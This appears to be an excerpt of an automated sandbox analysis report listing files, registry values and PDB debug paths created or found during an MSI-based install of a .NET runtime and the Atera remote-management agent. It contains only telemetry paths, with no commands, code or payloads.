                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.CSharp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Numerics.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-memory-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.FileVersionInfo.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Contracts.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l2-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.RuntimeInformation.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Ping.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceProcess.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.AccessControl.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Annotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.DiagnosticSource.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-stdio-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.ThreadPool.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.CoreLib.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.CodePages.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\.versionJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.Lightweight.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-process-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\hostJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxrJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxr\6.0.32Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\host\fxr\6.0.32\hostfxr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\dotnet.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\LICENSE.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\ThirdPartyNotices.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}Jump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\AteraSetupLog.txt
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\LICENSE.txtJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\LICENSE.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt
                                Source: Binary string: \??\C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exet.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000016.00000002.1582113314.0000026AD1DE2000.00000002.00000001.01000000.0000001A.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2566768207.00000248450A2000.00000002.00000001.01000000.00000047.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2141218924.000002139AE46000.00000002.00000001.01000000.00000038.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2134241384.00000165B08F2000.00000002.00000001.01000000.00000036.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Data.DataSetExtensions\net6.0-Release\System.Data.DataSetExtensions.pdb source: System.Data.DataSetExtensions.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageMarketplace\AgentPackageMarketplace\obj\Release\AgentPackageMarketplace.pdby source: AgentPackageMarketplace.exe, 0000003A.00000000.2008949218.00000165977F2000.00000002.00000001.01000000.0000002E.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ValueTuple/net47\System.ValueTuple.pdb62P2 B2_CorDllMainmscoree.dll source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1813154898.0000022AC08F2000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb5` source: Atera.AgentPackages.CommonLib.dll2.26.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdbSHA256G source: AgentPackageInternalPoller.exe, 00000037.00000002.2102333146.000001CC12CE2000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdbSHA256 source: AgentPackageInternalPoller.exe, 00000037.00000002.2129021473.000001CC2B782000.00000002.00000001.01000000.00000035.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbdq source: AgentPackageTicketing.exe, 00000033.00000002.2566768207.00000248450A2000.00000002.00000001.01000000.00000047.sdmp
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb' source: AgentPackageMarketplace.exe, 0000003A.00000002.2115830756.0000016597FE2000.00000002.00000001.01000000.00000031.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: api-ms-win-crt-time-l1-1-0.dll.2.dr
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 00000010.00000002.1925066470.0000023477EB2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: D:\a\CliWrap\CliWrap\CliWrap.Signaler\obj\Release\net35\CliWrap.Signaler.pdbSHA256 source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.OpenSsl\net6.0-Release\System.Security.Cryptography.OpenSsl.pdb source: System.Security.Cryptography.OpenSsl.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\AgentPackageProgramManagement\obj\Release\AgentPackageProgramManagement.pdb source: AgentPackageProgramManagement.exe, 00000035.00000000.1980617476.000002139A632000.00000002.00000001.01000000.0000002B.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\ThirdPartyPackageManager\obj\Release\ThirdPartyPackageManager.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2140375764.000002139AA62000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1557171190.000001FD40E72000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.16.dr
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1813643503.0000022AC0992000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: symbols\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb8+N+ @+_CorDllMainmscoree.dll source: System.Reflection.Primitives.dll.2.dr
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdben source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2408601657.0000010B6F742000.00000002.00000001.01000000.00000045.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb source: Atera.AgentPackages.CommonLib.dll2.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\TicketingPackageExtensions\obj\Release\TicketingPackageExtensions.pdbq$ source: AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmp
                                Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp
                                Source: Binary string: C:\buildAgent\work\1b72bc6dac87fa71\code_drop\merge\chocolatey.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdbSHA256`{f source: AgentPackageMonitoring.exe, 00000025.00000002.1813154898.0000022AC08F2000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000016.00000002.1582113314.0000026AD1DE2000.00000002.00000001.01000000.0000001A.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2141218924.000002139AE46000.00000002.00000001.01000000.00000038.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
                                Source: Binary string: PC:\Windows\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdbcccGCTL source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2012\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: ent.pdb0Pf source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ValueTuple/net47\System.ValueTuple.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1829135389.0000022AD92B2000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageMarketplace\AgentPackageMarketplace\obj\Release\AgentPackageMarketplace.pdb source: AgentPackageMarketplace.exe, 0000003A.00000000.2008949218.00000165977F2000.00000002.00000001.01000000.0000002E.sdmp
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdbSHA256 source: AgentPackageMonitoring.exe, 00000025.00000002.1813643503.0000022AC0992000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\net6.0-Release\System.IO.UnmanagedMemoryStream.pdb source: System.IO.UnmanagedMemoryStream.dll.2.dr
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000E.00000000.1397150472.000001E726672000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdbp+ source: AgentPackageMonitoring.exe, 00000025.00000002.1829135389.0000022AD92B2000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbdeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks\4.0.11.0\System.Threading.Tasks.pdb source: System.Threading.Tasks.dll.26.dr
                                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netstandard1.1\System.Buffers.pdbSHA256 source: System.Buffers.dll.26.dr
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdbJ source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: System.Security.Cryptography.OpenSsl.ni.pdb source: System.Security.Cryptography.OpenSsl.dll.2.dr
                                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Json\net6.0-Release\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.2.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdb source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000E.00000000.1397150472.000001E726672000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageADRemote\AgentPackageADRemote\obj\Release\AgentPackageADRemote.pdb source: AgentPackageADRemote.exe.26.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscorrc\mscorrc.pdb source: mscorrc.dll.2.dr
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdbSHA256 source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, System.ValueTuple.dll.16.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XmlSerializer\net6.0-Release\System.Xml.XmlSerializer.pdb source: System.Xml.XmlSerializer.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageInternalPoller\AgentPackageInternalPoller\obj\Release\AgentPackageInternalPoller.pdb source: AgentPackageInternalPoller.exe, 00000037.00000000.1996426946.000001CC122B2000.00000002.00000001.01000000.0000002C.sdmp
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 00000010.00000002.1925066470.0000023477EB2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1830316893.0000022AD9402000.00000002.00000001.01000000.00000026.sdmp
                                Source: Binary string: C:\code\dapper-dot-net\Dapper\bin\Release\net45\Dapper.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1828913877.0000022AD9272000.00000002.00000001.01000000.00000023.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmp
                                Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netstandard1.1\System.Buffers.pdb source: System.Buffers.dll.26.dr
                                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: System.Dynamic.Runtime.dll.26.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582261573.000001FD41872000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2126065368.000001CC2B560000.00000002.00000001.01000000.00000034.sdmp
                                Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb source: System.Reflection.Primitives.dll.2.dr
                                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000004.00000003.1309119878.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A67000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.000000000501A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1582261573.000001FD41872000.00000002.00000001.01000000.0000001B.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.1830316893.0000022AD9402000.00000002.00000001.01000000.00000026.sdmp, AgentPackageInternalPoller.exe, 00000037.00000002.2126065368.000001CC2B560000.00000002.00000001.01000000.00000034.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2141429257.00000165B0B22000.00000002.00000001.01000000.00000039.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.ValueTuple\netstandard1.0\System.ValueTuple.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A881D9F000.00000004.00000800.00020000.00000000.sdmp, System.ValueTuple.dll.16.dr
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2408601657.0000010B6F742000.00000002.00000001.01000000.00000045.sdmp
                                Source: Binary string: lib.pdb source: AgentPackageMonitoring.exe, 0000003D.00000002.2467763966.000001327BEBF000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageOsUpdates\AgentPackageOsUpdates\obj\Release\AgentPackageOsUpdates.pdb source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: CliWrap.pdb source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdbr source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdb source: AgentPackageMonitoring.exe, 00000025.00000000.1677575277.0000022ABFF12000.00000002.00000001.01000000.0000001D.sdmp
